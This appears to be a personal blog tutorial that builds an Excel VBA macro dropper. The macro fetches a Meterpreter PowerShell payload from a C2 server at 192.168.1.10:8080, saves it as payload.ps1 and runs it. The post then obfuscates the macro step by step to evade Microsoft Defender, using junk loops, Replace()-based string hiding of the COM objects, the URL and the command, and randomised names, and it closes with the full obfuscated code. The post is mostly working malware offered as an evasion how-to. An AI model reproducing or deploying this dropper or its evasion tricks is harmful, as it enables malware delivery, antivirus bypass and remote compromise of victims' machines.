Malware Project - Almost Bypass MsDefender
Disclaimer
: Hello This is actually my first real Macro while trying to obfuscate and ByPass Defender (Sort Of) ! This Code will escape Defender but the remote payload will not since it was a Meterpreter PowerShell, maybe in the next part 👨💻
Raw Code, no obfuscation
First of all, before trying to obfuscate a VBA code you might need a working code !
Here is a piece of code I used to download my payload form a C2 server :
Private Sub CommandButton1_Click() # Using a Excel ActivateX Button
DownloadFileFromURL # Call the DownloadFileFromURL function
Dim myoutputfile As Integer #Actually not using those 2 variable at the end 🤣
Dim FilePath As String
Shell ("powershell.exe -noexit .\\payload.ps1") # Execution of the PowerShell Payload (Here simple meterpreter)
End Sub
Sub DownloadFileFromURL()
Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP") # Call Windows Objects
Set objADODBStream = CreateObject("ADODB.Stream")
objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False # IP or ULR of the C2 and the payload as a TXT file
objXMLHTTP.Send
objADODBStream.Type = 1
objADODBStream.Open
objADODBStream.Write objXMLHTTP.responseBody
objADODBStream.savetofile "payload.ps1", 2 # Save the TXT into a PS1 Script
End Sub
So, this is not a big and fancy code here but it works ! AT this point Defender will beat the sh*t out of your file so, be careful !
First Stage - Non-sense Code
In this first stage I have a working code, but I whan to “lure” Defender by Adding random and non-sense code that’s doing nothing at all.
Here I choose to use while
loop everywhere like this
Dim t
t = 1
Do While t < 2
t = t + 1
Loop
Here is an example of what it looks like :
Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop
DownloadFileFromURL
Dim myoutputfile As Integer
Dim FilePath As String
Shell ("powershell.exe -noexit .\\payload.ps1")
End Sub
Sub DownloadFileFromURL()
Dim t,q,w,e,r,a,s
t = 1
Do While t < 5
t = t + 1
Loop
Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")
Set objADODBStream = CreateObject("ADODB.Stream")
objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False
objXMLHTTP.Send
objADODBStream.Type = 1
objADODBStream.Open
objADODBStream.Write objXMLHTTP.responseBody
objADODBStream.savetofile "payload.ps1", 2
End Sub
This kind of code is also used to make the reverse of the malware very difficult for the analyst.
Second Stage - Obfuscate the Objects
While thinking about my code and a way to turn it into more garbage, I decided to hide the MS Objects called in the Download Function.
This kind of call are automatically trigger as malicious since there are mostly used by malwares, so I found a way to hide them in the code using the Replace()
function.
Here is a simple Example
A = "Mic00000ft"
B = Replace(A,"00000","roso")
In this example, the B variable will contains “Microsoft” since I replace the “00000” by the rest of the word and I can use the variable B inside CreateObject()
.
Here is what it looks like ( I place some 0000
just to avoid the mess in this code block but you can put any random string you want and it’s better)
q = "Mic00000000000000000000000000000ft"
w = Replace(q,"00000000000000000000000000000","roso")
e = "XM00000000000000000000000000000TP"
r = Replace(e,"00000000000000000000000000000","LHT")
a = "AD00000000000000000000000000000B"
s = Replace(a,"00000000000000000000000000000","OD")
b = "St00000000000000000000000000000am"
n = Replace(b,"00000000000000000000000000000","re")
Set objXMLHTTP = CreateObject(w & "." & r)
Set objADODBStream = CreateObject(s & "." & n)
Don’t forget to hide the URL as well:
qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
pp = "pay0000000000000000000d"
kk = Replace(pp,"0000000000000000000","loa")
objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
objXMLHTTP.Send
Of course there are many may ways to hide data like this, I’m using the simplest way possible right now
Hide that Shell !
One of the most triggered function is the Shell
command ! But there are many ways to bypass Defender and not directly use this command.
Set Shell = CreateObject("WScript.Shell")
Shell.Run("whoami")
Like the previous objects, we’ll use the same method to hide the WScript Object.
x = "WS0000000000000000000000000pt"
c = Replace(x,"0000000000000000000000000","cri")
v = "Sh0000000000000000000000000l"
f = Replace(v,"0000000000000000000000000","el")
Set Shell = CreateObject(c & "." & f)
Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
I aslso divided the powershell command so it’s not directy written on the script
Last Stage - Random names
The final stage at that point si just to use random strings as function name or variables.
For that part i’m using an Online tool called Code Protection an I just need to mention all the name I want to replace in this code.
Here is the code without random strings:
Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop
DownloadFileFromURL
Dim myoutputfile As Integer
Dim FilePath As String
x = "WS0000000000000000000000000pt"
c = Replace(x,"0000000000000000000000000","cri")
v = "Sh0000000000000000000000000l"
f = Replace(v,"0000000000000000000000000","el")
Set Shell = CreateObject(c & "." & f)
Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
End Sub
Sub DownloadFileFromURL()
Dim t,q,w,e,r,a,s,b,n,qq,ww,ee,rr,pp,kk
t = 1
Do While t < 5
t = t + 1
Loop
q = "Mic00000000000000000000000000000ft"
w = Replace(q,"00000000000000000000000000000","roso")
e = "XM00000000000000000000000000000TP"
r = Replace(e,"00000000000000000000000000000","LHT")
a = "AD00000000000000000000000000000B"
s = Replace(a,"00000000000000000000000000000","OD")
b = "St00000000000000000000000000000am"
n = Replace(b,"00000000000000000000000000000","re")
Set objXMLHTTP = CreateObject(w & "." & r)
Set objADODBStream = CreateObject(s & "." & n)
qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
pp = "pay0000000000000000000d"
kk = Replace(pp,"0000000000000000000","loa")
objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
objXMLHTTP.Send
objADODBStream.Type = 1
objADODBStream.Open
objADODBStream.Write objXMLHTTP.responseBody
objADODBStream.savetofile "payload.ps1", 2
End Sub
ANd here is the finale code with “full” obfuscation:
Private Sub CommandButton1_Click()
Dim nf7d7aafa614ae2e12b395d5df9ee4929,y5e2e19a97c2f321d8ce6e7ff6497d702,y701c18a7c7d41871239961947e31b2cd,ef34bc76f2d314271e34337eab2eb2cd2,qc0cc6e49592dec80416d6a3da9f01597,beb81d1e85adc52615465c469a1c20bab,xcd4143bfd53557b1234092d59353cfe5
nf7d7aafa614ae2e12b395d5df9ee4929 = 1
Do While nf7d7aafa614ae2e12b395d5df9ee4929 < 2
nf7d7aafa614ae2e12b395d5df9ee4929 = nf7d7aafa614ae2e12b395d5df9ee4929 + 1
Loop
t0894a182edb305bfc894f9a0d77ae549
Dim b8da5de0cf00af37347314a034ce6ac76 As Integer
Dim bcf9563044e940bcb370186ece0207409 As String
y5e2e19a97c2f321d8ce6e7ff6497d702 = "WS0000000000000000000000000pt"
y701c18a7c7d41871239961947e31b2cd = Replace(y5e2e19a97c2f321d8ce6e7ff6497d702,"0000000000000000000000000","cri")
ef34bc76f2d314271e34337eab2eb2cd2 = "Sh0000000000000000000000000l"
qc0cc6e49592dec80416d6a3da9f01597 = Replace(ef34bc76f2d314271e34337eab2eb2cd2,"0000000000000000000000000","el")
Set qe46fdc45ae3a5515584f4d44a8b8b2df = CreateObject(y701c18a7c7d41871239961947e31b2cd & "." & qc0cc6e49592dec80416d6a3da9f01597)
qe46fdc45ae3a5515584f4d44a8b8b2df.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
End Sub
Sub t0894a182edb305bfc894f9a0d77ae549()
Dim e97b8956a358b260b24afd06d64494c4d,yffcbe4af74f35a61ac88aaa0d41c9d86,e1c09f164c1c3bf60b15c09b54cf7a8b8,e5c068c60001ee2d4009beea3ad32b6e1,nfe31c02a86912d80a6cceb7de2c789ec,c17fea5c0191a5bc3c2640b8f16b14e98,y560c5fa7e5f4ddabb1dea7096c30fbb3,ea06f6764676da2a53039a8c582369215,vd788acd2ab98604acf912471d7b2c47d,ec8a6296f4b0f1b2953f0f43b25d28c20,bed6dad1b0c47ef9d6216c7e497e4fe06,q2df3664a88d9cc00cc1292b9cfc38a51,b860812e2b3f298fda368e6ddfcab2411,x3a75ddb3e3822fdc37a0501d9420704e,r69ab3e7a1c107402489ab3fd7b058463
e97b8956a358b260b24afd06d64494c4d = 1
Do While e97b8956a358b260b24afd06d64494c4d < 5
e97b8956a358b260b24afd06d64494c4d = e97b8956a358b260b24afd06d64494c4d + 1
Loop
yffcbe4af74f35a61ac88aaa0d41c9d86 = "Mic00000000000000000000000000000ft"
e1c09f164c1c3bf60b15c09b54cf7a8b8 = Replace(yffcbe4af74f35a61ac88aaa0d41c9d86,"00000000000000000000000000000","roso")
e5c068c60001ee2d4009beea3ad32b6e1 = "XM00000000000000000000000000000TP"
nfe31c02a86912d80a6cceb7de2c789ec = Replace(e5c068c60001ee2d4009beea3ad32b6e1,"00000000000000000000000000000","LHT")
c17fea5c0191a5bc3c2640b8f16b14e98 = "AD00000000000000000000000000000B"
y560c5fa7e5f4ddabb1dea7096c30fbb3 = Replace(c17fea5c0191a5bc3c2640b8f16b14e98,"00000000000000000000000000000","OD")
ea06f6764676da2a53039a8c582369215 = "St00000000000000000000000000000am"
vd788acd2ab98604acf912471d7b2c47d = Replace(ea06f6764676da2a53039a8c582369215,"00000000000000000000000000000","re")
Set q7089b94b9f9e338b5cdc57f6a3245c47 = CreateObject(e1c09f164c1c3bf60b15c09b54cf7a8b8 & "." & nfe31c02a86912d80a6cceb7de2c789ec)
Set r6deb5e78454a0af561242cf3d291aa21 = CreateObject(y560c5fa7e5f4ddabb1dea7096c30fbb3 & "." & vd788acd2ab98604acf912471d7b2c47d)
ec8a6296f4b0f1b2953f0f43b25d28c20 = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
bed6dad1b0c47ef9d6216c7e497e4fe06 = Replace(ec8a6296f4b0f1b2953f0f43b25d28c20,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
q2df3664a88d9cc00cc1292b9cfc38a51 = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
b860812e2b3f298fda368e6ddfcab2411 = Replace(q2df3664a88d9cc00cc1292b9cfc38a51,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
x3a75ddb3e3822fdc37a0501d9420704e = "pay0000000000000000000d"
r69ab3e7a1c107402489ab3fd7b058463 = Replace(x3a75ddb3e3822fdc37a0501d9420704e,"0000000000000000000","loa")
q7089b94b9f9e338b5cdc57f6a3245c47.Open "GET", "http://" & bed6dad1b0c47ef9d6216c7e497e4fe06 & ":" & b860812e2b3f298fda368e6ddfcab2411 & "/" & r69ab3e7a1c107402489ab3fd7b058463 & ".txt", False
q7089b94b9f9e338b5cdc57f6a3245c47.Send
r6deb5e78454a0af561242cf3d291aa21.Type = 1
r6deb5e78454a0af561242cf3d291aa21.Open
r6deb5e78454a0af561242cf3d291aa21.Write q7089b94b9f9e338b5cdc57f6a3245c47.responseBody
r6deb5e78454a0af561242cf3d291aa21.savetofile "payload.ps1", 2
End Sub
Hope you enjoy this little post, I’ll try to write a next part with the “evasion” of the last stage, the execution of the reverse shell !
Thanks !